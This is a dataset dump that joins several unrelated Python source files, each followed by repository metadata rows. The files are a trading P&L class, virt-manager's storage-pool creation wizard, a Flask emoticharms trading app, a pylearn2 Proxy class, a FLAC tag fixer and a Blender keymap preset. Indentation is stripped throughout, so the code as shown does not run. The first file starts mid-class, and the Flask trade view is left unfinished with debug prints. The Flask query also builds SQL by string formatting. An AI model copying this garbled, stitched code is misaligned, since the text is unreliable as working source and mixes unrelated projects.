@property
def average_price(self):
if self._quantity == 0:
return numpy.NaN
return self._cost / self._quantity
def calc_market_value(self, current_price):
return self.quantity * current_price
def calc_unrealized_pnl(self, current_price):
return self.calc_market_value(current_price) - self.acquisition_cost
def calc_total_pnl(self, current_price):
return self.realized_pnl + self.calc_unrealized_pnl(current_price)
def add_fill(self, fill_qty, fill_price):
"""
Adding a fill to the record updates the P&L values.
:param fill_qty:
:param fill_price:
:param fees: a dict containing fees that apply on the trade
:return:
"""
logging.debug('adding fill: %s at %s (amount: %.2f)', fill_qty, fill_price, fill_qty * fill_price)
old_qty = self._quantity
if old_qty == 0:
self._quantity = fill_qty
self._cost = fill_qty * fill_price
else:
old_cost = self._cost
old_realized = self._realized_pnl
closing_qty = 0
opening_qty = fill_qty
if math.copysign(1, old_qty) != math.copysign(1, fill_qty):
closing_qty = min(abs(old_qty), abs(fill_qty)) * math.copysign(1, fill_qty)
opening_qty = fill_qty - closing_qty
self._quantity = old_qty + fill_qty
self._cost = old_cost + (opening_qty * fill_price) + (closing_qty * old_cost / old_qty)
self._realized_pnl = old_realized + closing_qty * (old_cost / old_qty - fill_price)
self._realized_pnl -= self.fee_model.compute_fees(fill_qty, fill_price)
| apache-2.0 | 5,239,085,414,607,550,000 | 28.954023 | 106 | 0.60284 | false | 3.57476 | false | false | false |
jiemohuishou/virt-manager-0.9.3 | src/virtManager/createpool.py | 1 | 23776 | #
# Copyright (C) 2008 Red Hat, Inc.
# Copyright (C) 2008 Cole Robinson <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import gtk
import copy
import logging
from virtManager import util
from virtManager.baseclass import vmmGObjectUI
from virtManager.asyncjob import vmmAsyncJob
from virtinst import Storage
PAGE_NAME = 0
PAGE_FORMAT = 1
_comboentry_xml = """
<interface>
<object class="GtkComboBoxEntry" id="pool-source-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_source_path_changed"/>
<signal name="focus" handler="on_pool_source_path_focus"/>
</object>
<object class="GtkComboBoxEntry" id="pool-target-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_target_path_changed"/>
<signal name="focus_in_event" handler="on_pool_target_path_focus_in_event"/>
</object>
</interface>
"""
class vmmCreatePool(vmmGObjectUI):
def __init__(self, conn):
vmmGObjectUI.__init__(self,
"vmm-create-pool.ui",
"vmm-create-pool")
self.conn = conn
self._pool = None
self._pool_class = Storage.StoragePool
self.window.add_from_string(_comboentry_xml)
self.widget("pool-source-box").pack_start(
self.widget("pool-source-path"))
self.widget("pool-target-box").pack_start(
self.widget("pool-target-path"))
self.window.connect_signals({
"on_pool_forward_clicked" : self.forward,
"on_pool_back_clicked" : self.back,
"on_pool_cancel_clicked" : self.close,
"on_vmm_create_pool_delete_event" : self.close,
"on_pool_finish_clicked" : self.forward,
"on_pool_pages_change_page" : self.page_changed,
"on_pool_source_button_clicked" : self.browse_source_path,
"on_pool_target_button_clicked" : self.browse_target_path,
"on_pool_name_activate": self.forward,
"on_pool_hostname_activate" : self.hostname_changed,
"on_pool_iqn_chk_toggled": self.iqn_toggled,
"on_pool_name_focus_in_event": (self.update_doc, "name",
"pool-info1"),
# I cannot for the life of me get a combobox to abide
# focus-in, button-pressed, motion-over, etc.
"on_pool_type_focus": (self.update_doc, "type", "pool-info1"),
"on_pool_type_changed": (self.update_doc_changed, "type",
"pool-info1"),
"on_pool_format_focus": (self.update_doc, "format", "pool-info2"),
"on_pool_format_changed": (self.update_doc_changed, "format",
"pool-info2"),
"on_pool_target_path_focus_in_event": (self.update_doc,
"target_path",
"pool-info2"),
"on_pool_target_path_focus": (self.update_doc, "target_path",
"pool-info2"),
"on_pool_target_path_changed": (self.update_doc_changed,
"target_path",
"pool-info2"),
"on_pool_source_path_focus_in_event": (self.update_doc,
"source_path",
"pool-info2"),
"on_pool_source_path_focus": (self.update_doc, "source_path",
"pool-info2"),
"on_pool_source_path_changed": (self.update_doc_changed,
"source_path",
"pool-info2"),
"on_pool_hostname_focus_in_event": (self.update_doc, "host",
"pool-info2"),
"on_pool_build_focus_in_event": (self.update_build_doc),
"on_pool_iqn_focus_in_event": (self.update_doc, "iqn",
"pool-info2"),
})
self.bind_escape_key_close()
# XXX: Help docs useless/out of date
self.widget("pool-help").hide()
finish_img = gtk.image_new_from_stock(gtk.STOCK_QUIT,
gtk.ICON_SIZE_BUTTON)
self.widget("pool-finish").set_image(finish_img)
self.set_initial_state()
def show(self, parent):
logging.debug("Showing new pool wizard")
self.reset_state()
self.topwin.set_transient_for(parent)
self.topwin.present()
def close(self, ignore1=None, ignore2=None):
logging.debug("Closing new pool wizard")
self.topwin.hide()
return 1
def _cleanup(self):
self.conn = None
self._pool = None
def set_initial_state(self):
self.widget("pool-pages").set_show_tabs(False)
type_list = self.widget("pool-type")
type_model = gtk.ListStore(str, str)
type_list.set_model(type_model)
text1 = gtk.CellRendererText()
type_list.pack_start(text1, True)
type_list.add_attribute(text1, 'text', 1)
format_list = self.widget("pool-format")
format_model = gtk.ListStore(str, str)
format_list.set_model(format_model)
text2 = gtk.CellRendererText()
format_list.pack_start(text2, False)
format_list.add_attribute(text2, 'text', 1)
# Target path combo box entry
target_list = self.widget("pool-target-path")
# target_path, Label, pool class instance
target_model = gtk.ListStore(str, str, object)
target_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
target_list.set_model(target_model)
target_list.set_text_column(0)
target_list.child.connect("focus-in-event", self.update_doc,
"target_path", "pool-info2")
# Source path combo box entry
source_list = self.widget("pool-source-path")
# source_path, Label, pool class instance
source_model = gtk.ListStore(str, str, object)
source_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
source_list.set_model(source_model)
source_list.set_text_column(0)
source_list.child.connect("focus-in-event", self.update_doc,
"source_path", "pool-info2")
self.populate_pool_type()
self.widget("pool-info-box1").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
self.widget("pool-info-box2").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
def reset_state(self):
self.widget("pool-pages").set_current_page(0)
self.widget("pool-forward").show()
self.widget("pool-finish").hide()
self.widget("pool-back").set_sensitive(False)
self.widget("pool-name").set_text("")
self.widget("pool-name").grab_focus()
self.widget("pool-type").set_active(0)
self.widget("pool-target-path").child.set_text("")
self.widget("pool-source-path").child.set_text("")
self.widget("pool-hostname").set_text("")
self.widget("pool-iqn-chk").set_active(False)
self.widget("pool-iqn-chk").toggled()
self.widget("pool-iqn").set_text("")
self.widget("pool-format").set_active(-1)
self.widget("pool-build").set_sensitive(True)
self.widget("pool-build").set_active(False)
def hostname_changed(self, ignore):
# If a hostname was entered, try to lookup valid pool sources.
self.populate_pool_sources()
def iqn_toggled(self, src):
self.widget("pool-iqn").set_sensitive(src.get_active())
def populate_pool_type(self):
model = self.widget("pool-type").get_model()
model.clear()
types = Storage.StoragePool.get_pool_types()
types.sort()
for typ in types:
model.append([typ, "%s: %s" %
(typ, Storage.StoragePool.get_pool_type_desc(typ))])
def populate_pool_format(self, formats):
model = self.widget("pool-format").get_model()
model.clear()
for f in formats:
model.append([f, f])
def populate_pool_sources(self):
source_list = self.widget("pool-source-path")
source_model = source_list.get_model()
source_model.clear()
target_list = self.widget("pool-target-path")
target_model = target_list.get_model()
target_model.clear()
use_list = source_list
use_model = source_model
entry_list = []
if self._pool.type == Storage.StoragePool.TYPE_SCSI:
entry_list = self.list_scsi_adapters()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
pool_list = self.list_pool_sources()
entry_list = map(lambda p: [p.target_path, p.target_path, p],
pool_list)
use_list = target_list
use_model = target_model
elif self._pool.type == Storage.StoragePool.TYPE_DISK:
entry_list = self.list_disk_devs()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_NETFS:
host = self.get_config_host()
if host:
pool_list = self.list_pool_sources(host=host)
entry_list = map(lambda p: [p.source_path, p.source_path, p],
pool_list)
use_list = source_list
use_model = source_model
for e in entry_list:
use_model.append(e)
if entry_list:
use_list.set_active(0)
def list_scsi_adapters(self):
scsi_hosts = self.conn.get_nodedevs("scsi_host")
host_list = map(lambda dev: dev.host, scsi_hosts)
clean_list = []
for h in host_list:
tmppool = copy.copy(self._pool)
name = "host%s" % h
tmppool.source_path = name
entry = [name, name, tmppool]
if name not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_disk_devs(self):
devs = self.conn.get_nodedevs("storage")
devlist = []
for dev in devs:
if dev.drive_type != "disk" or not dev.block:
continue
devlist.append(dev.block)
devlist.sort()
clean_list = []
for dev in devlist:
tmppool = copy.copy(self._pool)
tmppool.source_path = dev
entry = [dev, dev, tmppool]
if dev not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_pool_sources(self, host=None):
name = self.get_config_name()
pool_type = self._pool.type
plist = []
try:
plist = Storage.StoragePool.pool_list_from_sources(self.conn.vmm,
name, pool_type,
host=host)
except Exception:
logging.exception("Pool enumeration failed")
return plist
def show_options_by_pool(self):
def show_row(base, do_show):
self.widget(base + "-label").set_property("visible", do_show)
self.widget(base + "-box").set_property("visible", do_show)
src = hasattr(self._pool, "source_path")
src_b = src and not self.conn.is_remote()
tgt = hasattr(self._pool, "target_path")
tgt_b = tgt and not self.conn.is_remote()
host = hasattr(self._pool, "host")
fmt = hasattr(self._pool, "formats")
iqn = hasattr(self._pool, "iqn")
builddef, buildsens = self.get_build_default()
# Source path broswing is meaningless for net pools
if self._pool.type in [Storage.StoragePool.TYPE_NETFS,
Storage.StoragePool.TYPE_ISCSI,
Storage.StoragePool.TYPE_SCSI]:
src_b = False
show_row("pool-target", tgt)
show_row("pool-source", src)
show_row("pool-hostname", host)
show_row("pool-format", fmt)
show_row("pool-build", buildsens)
show_row("pool-iqn", iqn)
self.widget("pool-target-path").child.set_text(self._pool.target_path)
self.widget("pool-target-button").set_sensitive(tgt_b)
self.widget("pool-source-button").set_sensitive(src_b)
self.widget("pool-build").set_active(builddef)
self.widget("pool-format").set_active(-1)
if fmt:
self.populate_pool_format(getattr(self._pool, "formats"))
self.widget("pool-format").set_active(0)
self.populate_pool_sources()
def get_config_type(self):
typ = self.widget("pool-type")
if typ.get_active_iter() != None:
return typ.get_model().get_value(typ.get_active_iter(), 0)
return None
def get_config_name(self):
return self.widget("pool-name").get_text()
def get_config_target_path(self):
src = self.widget("pool-target-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text()
def get_config_source_path(self):
src = self.widget("pool-source-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text().strip()
def get_config_host(self):
host = self.widget("pool-hostname")
if host.get_property("sensitive"):
return host.get_text().strip()
return None
def get_config_format(self):
format_combo = self.widget("pool-format")
model = format_combo.get_model()
if format_combo.get_active_iter() != None:
model = format_combo.get_model()
return model.get_value(format_combo.get_active_iter(), 0)
return None
def get_config_iqn(self):
iqn = self.widget("pool-iqn")
if iqn.get_property("sensitive") and iqn.get_property("visible"):
return iqn.get_text().strip()
return None
def get_build_default(self):
""" Return (default value, whether build option can be changed)"""
if not self._pool:
return (False, False)
if self._pool.type in [Storage.StoragePool.TYPE_DIR,
Storage.StoragePool.TYPE_FS,
Storage.StoragePool.TYPE_NETFS]:
# Building for these simply entails creating a directory
return (True, False)
elif self._pool.type in [Storage.StoragePool.TYPE_LOGICAL,
Storage.StoragePool.TYPE_DISK]:
# This is a dangerous operation, anything (False, True)
# should be assumed to be one.
return (False, True)
else:
return (False, False)
def browse_source_path(self, ignore1=None):
source = self._browse_file(_("Choose source path"),
startfolder="/dev", foldermode=False)
if source:
self.widget("pool-source-path").child.set_text(source)
def browse_target_path(self, ignore1=None):
target = self._browse_file(_("Choose target directory"),
startfolder="/var/lib/libvirt",
foldermode=True)
if target:
self.widget("pool-target-path").child.set_text(target)
def forward(self, ignore=None):
notebook = self.widget("pool-pages")
try:
if(self.validate(notebook.get_current_page()) != True):
return
if notebook.get_current_page() == PAGE_FORMAT:
self.finish()
else:
self.widget("pool-forward").grab_focus()
notebook.next_page()
except Exception, e:
self.err.show_err(_("Uncaught error validating input: %s") % str(e))
return
def back(self, ignore=None):
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-pages").prev_page()
def finish(self):
self.topwin.set_sensitive(False)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
build = self.widget("pool-build").get_active()
progWin = vmmAsyncJob(self._async_pool_create, [build],
_("Creating storage pool..."),
_("Creating the storage pool may take a "
"while..."),
self.topwin)
error, details = progWin.run()
self.topwin.set_sensitive(True)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.TOP_LEFT_ARROW))
if error:
error = _("Error creating pool: %s") % error
self.err.show_err(error,
details=details)
else:
self.close()
def _async_pool_create(self, asyncjob, build):
newconn = None
# Open a seperate connection to install on since this is async
newconn = util.dup_lib_conn(self._pool.conn)
meter = asyncjob.get_meter()
self._pool.conn = newconn
logging.debug("Starting backround pool creation.")
poolobj = self._pool.install(create=True, meter=meter, build=build)
poolobj.setAutostart(True)
logging.debug("Pool creation succeeded")
def page_changed(self, notebook_ignore, page_ignore, page_number):
if page_number == PAGE_NAME:
self.widget("pool-back").set_sensitive(False)
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-forward").grab_focus()
elif page_number == PAGE_FORMAT:
self.widget("pool-back").set_sensitive(True)
self.widget("pool-finish").show()
self.widget("pool-finish").grab_focus()
self.widget("pool-forward").hide()
self.show_options_by_pool()
def get_pool_to_validate(self):
"""
Return a pool instance to use for parameter assignment validation.
For most pools this will be the one we built after step 1, but for
pools we find via FindPoolSources, this will be different
"""
source_list = self.widget("pool-source-path")
target_list = self.widget("pool-target-path")
pool = copy.copy(self._pool)
if source_list.get_active() != -1:
pool = source_list.get_model()[source_list.get_active()][2]
elif target_list.get_active() != -1:
pool = target_list.get_model()[target_list.get_active()][2]
return pool
def validate(self, page):
if page == PAGE_NAME:
typ = self.get_config_type()
name = self.get_config_name()
conn = self.conn.vmm
try:
self._pool_class = Storage.StoragePool.get_pool_class(typ)
self._pool = self._pool_class(name=name, conn=conn)
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
return True
elif page == PAGE_FORMAT:
target = self.get_config_target_path()
host = self.get_config_host()
source = self.get_config_source_path()
fmt = self.get_config_format()
iqn = self.get_config_iqn()
tmppool = self.get_pool_to_validate()
try:
tmppool.target_path = target
if host:
tmppool.host = host
if source:
tmppool.source_path = source
if fmt:
tmppool.format = fmt
if iqn:
tmppool.iqn = iqn
tmppool.get_xml_config()
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
buildval = self.widget("pool-build").get_active()
buildsen = (self.widget("pool-build").get_property("sensitive") and
self.widget("pool-build-box").get_property("visible"))
if buildsen and buildval:
ret = self.err.yes_no(_("Building a pool of this type will "
"format the source device. Are you "
"sure you want to 'build' this pool?"))
if not ret:
return ret
self._pool = tmppool
return True
def update_doc(self, ignore1, ignore2, param, infobox):
doc = self._build_doc_str(param)
self.widget(infobox).set_markup(doc)
def update_build_doc(self, ignore1, ignore2):
doc = ""
docstr = ""
if self._pool.type == Storage.StoragePool.TYPE_DISK:
docstr = _("Format the source device.")
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
docstr = _("Create a logical volume group from the source device.")
if docstr:
doc = self._build_doc_str("build", docstr)
self.widget("pool-info2").set_markup(doc)
def update_doc_changed(self, ignore1, param, infobox):
# Wrapper for update_doc and 'changed' signal
self.update_doc(None, None, param, infobox)
def _build_doc_str(self, param, docstr=None):
doc = ""
doctmpl = "<i><u>%s</u>: %s</i>"
prettyname = param.replace("_", " ").capitalize()
if docstr:
doc = doctmpl % (prettyname, docstr)
elif hasattr(self._pool_class, param):
doc = doctmpl % (prettyname,
getattr(self._pool_class, param).__doc__)
return doc
def _browse_file(self, dialog_name, startfolder=None, foldermode=False):
mode = gtk.FILE_CHOOSER_ACTION_OPEN
if foldermode:
mode = gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER
return util.browse_local(self.topwin, dialog_name, self.conn,
dialog_type=mode,
start_folder=startfolder)
vmmGObjectUI.type_register(vmmCreatePool)
| gpl-2.0 | -9,079,758,717,288,793,000 | 36.920255 | 84 | 0.549714 | false | 3.929268 | true | false | false |
Arcana/emoticharms.trade | app/emoticharms/views.py | 1 | 4346 | from app import db
from ..emoticharms.models import UserPack, Pack
from flask import Blueprint, render_template, abort
from forms import UserPacksForm, PackQuantityField
from ..util import valid_ti5_ticket
from flask.ext.login import login_required, current_user
from ..users.models import User
emoticharms = Blueprint("emoticharms", __name__, url_prefix="/emoticharms")
@emoticharms.route('/collection/', methods=['GET', 'POST'])
@login_required
@valid_ti5_ticket
def collection():
form = UserPacksForm()
if form.validate_on_submit():
print 'submitted'
for field in form:
if not isinstance(field, PackQuantityField):
continue
user_pack = UserPack.query.filter_by(pack_id=field.pack.id, user_id=current_user.account_id).first()
if user_pack is None:
user_pack = UserPack(field.pack.id, current_user.account_id, field.data)
db.session.add(user_pack)
else:
user_pack.quantity = field.data
db.session.commit()
form_data = {
user_pack.pack.normalized_name: user_pack.quantity
for user_pack in UserPack.query.filter_by(user=current_user).all()
}
print form_data
form = UserPacksForm(data=form_data)
return render_template('emoticharms/collection.html', form=form)
@emoticharms.route('/matches/')
@login_required
@valid_ti5_ticket
def matches():
"""
Match with other users by the count of packs the other party has that we want,
and that the other party wants and we have. Ordered by the most amount of combined packs matched.
"""
# Get ids of own packs where we own 0 (we need)
wanted_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0).all()
spare_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity > 1).all()
wanted_pack_ids = [unicode(user_pack.pack_id) for user_pack in wanted_packs]
spare_pack_ids = [unicode(user_pack.pack_id) for user_pack in spare_packs]
# Get ids of owned packs that are greater than 1 (our dupes)
matches_query = db.engine.execute("""
SELECT
account_id,
SUM(spare_count) as other_user_has_spare_count,
SUM(want_count) as other_user_wants_count,
(spare_count + want_count) as total_count
FROM (
SELECT u.account_id, COUNT(*) as spare_count, 0 as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({wanted_pack_ids}) AND up.quantity > 1
GROUP BY u.account_id
UNION
SELECT u.account_id, 0 as spare_count, COUNT(*) as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({spare_pack_ids}) AND up.quantity = 0
GROUP BY u.account_id
) counts_table
GROUP BY counts_table.account_id
ORDER BY total_count desc
""".format(
wanted_pack_ids=','.join(wanted_pack_ids),
spare_pack_ids=','.join(spare_pack_ids)
)
)
# Attach user objects (probably a lot better way to do this)
matches = []
for match in matches_query:
matches.append({
'user': User.query.filter(User.account_id == match[0]).first(),
'other_user_has_spare_count': match[1],
'other_user_wants_count': match[2]
})
return render_template('emoticharms/matches.html',
wanted_packs=wanted_packs,
spare_packs=spare_packs,
matches=matches)
@emoticharms.route('/trade/<int:trade_user_id>/')
@login_required
@valid_ti5_ticket
def trade(trade_user_id):
if trade_user_id == current_user.account_id:
abort(404)
trade_user = User.query.get_or_404(trade_user_id)
w1 = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0)
w2 = UserPack.query.filter(UserPack.user_id == trade_user.account_id, UserPack.quantity > 1)
#h1
#h2
user1 = w1.intersect(w2).all()
print user1
#user2 =
trade = {
"target_user": trade_user,
"giving": [],
"receiving": [],
}
return render_template('emoticharms/trade.html', trade=trade) | gpl-2.0 | 9,041,931,948,394,719,000 | 32.183206 | 115 | 0.631845 | false | 3.422047 | false | false | false |
TNick/pyl2extra | pyl2extra/config/proxy.py | 1 | 2004 | """Module containing the Train class and support functionality."""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2015, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from collections import namedtuple
# Lightweight container for initial YAML evaluation.
#
# This is intended as a robust, forward-compatible intermediate representation
# for either internal consumption or external consumption by another tool e.g.
# hyperopt.
#
# We've included a slot for positionals just in case, though they are
# unsupported by the instantiation mechanism as yet.
BaseProxy = namedtuple('BaseProxy', ['callable', 'positionals',
'keywords', 'yaml_src'])
class Proxy(BaseProxy):
"""
An intermediate representation between initial YAML parse and object
instantiation.
Parameters
----------
callable : callable
The function/class to call to instantiate this node.
positionals : iterable
Placeholder for future support for positional arguments (`*args`).
keywords : dict-like
A mapping from keywords to arguments (`**kwargs`), which may be
`Proxy`s or `Proxy`s nested inside `dict` or `list` instances.
Keys must be strings that are valid Python variable names.
yaml_src : str
The YAML source that created this node, if available.
Notes
-----
This is intended as a robust, forward-compatible intermediate
representation for either internal consumption or external consumption
by another tool e.g. hyperopt.
This particular class mainly exists to override `BaseProxy`'s `__hash__`
(to avoid hashing unhashable namedtuple elements).
"""
__slots__ = []
def __hash__(self):
"""
Return a hash based on the object ID (to avoid hashing unhashable
namedtuple elements).
"""
return hash(id(self))
| bsd-3-clause | -2,535,705,651,637,892,600 | 33.551724 | 78 | 0.676647 | false | 4.523702 | false | false | false |
ebertland/audio-tools | fix-mb-tags.py | 1 | 1157 | #!/usr/bin/env python
# Copyright 2009 by Jeff Ebert
# License: GNU GPL v2
import sys
import mutagen.flac
import os.path as path
# Tip from:
# http://stackoverflow.com/questions/492483/setting-the-correct-encoding-when-piping-stdout-in-python
import codecs
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
def fix_mb_tags(flac_file):
for tag in flac_file:
if tag.startswith('musicbrainz_'):
# The value of each tag is a list, so I must iterate even though
# there is only 1 for these cases.
values = flac_file[tag]
for i in range(len(values)):
# Extract UUID value from URL.
base = path.basename(values[i])
base = path.splitext(base)[0]
values[i] = base
flac_file[tag] = values
def main(argv):
if len(argv) == 1:
print "Usage: {0} <flac file>+\n".format(path.basename(argv[0]))
sys.exit(0)
for fn in argv[1:]:
flac_file = mutagen.flac.Open(fn)
fix_mb_tags(flac_file)
print flac_file.pprint()
flac_file.save()
if __name__ == '__main__':
main(sys.argv)
| mit | 5,164,661,301,358,378,000 | 26.547619 | 101 | 0.59032 | false | 3.305714 | false | false | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/presets/keyconfig/pie_keymap.py | 1 | 33628 | import bpy
import os
def kmi_props_setattr(kmi_props, attr, value):
try:
setattr(kmi_props, attr, value)
except AttributeError:
print("Warning: property '%s' not found in keymap item '%s'" %
(attr, kmi_props.__class__.__name__))
except Exception as e:
print("Warning: %r" % e)
wm = bpy.context.window_manager
kc = wm.keyconfigs.new(os.path.splitext(os.path.basename(__file__))[0])
# Map Object Mode
km = kc.keymaps.new('Object Mode', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.use_proportional_edit_objects')
kmi = km.keymap_items.new('view3d.game_start', 'P', 'PRESS')
kmi = km.keymap_items.new('object.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('object.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('object.select_linked', 'L', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_grouped', 'G', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_mirror', 'M', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.parent_no_inverse_set', 'P', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.parent_clear', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.track_set', 'T', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.track_clear', 'T', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.constraint_add_with_targets', 'C', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.constraints_clear', 'C', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.location_clear', 'G', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.rotation_clear', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.scale_clear', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.origin_clear', 'O', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_clear', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('object.hide_render_clear', 'H', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.hide_render_set', 'H', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.move_to_layer', 'M', 'PRESS')
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_add')
kmi = km.keymap_items.new('object.duplicates_make_real', 'A', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_apply')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_single_user')
kmi = km.keymap_items.new('wm.call_menu', 'L', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_links')
kmi = km.keymap_items.new('object.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.duplicate_move_linked', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.join', 'J', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.convert', 'C', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.proxy_make', 'P', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.make_local', 'L', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_insert_menu', 'I', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_delete_v3d', 'I', 'PRESS', alt=True)
kmi = km.keymap_items.new('anim.keying_set_active_set', 'I', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.create', 'G', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('group.objects_remove', 'G', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_remove_all', 'G', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_add_active', 'G', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('group.objects_remove_active', 'G', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_specials')
kmi.active = False
kmi = km.keymap_items.new('object.data_transfer', 'T', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
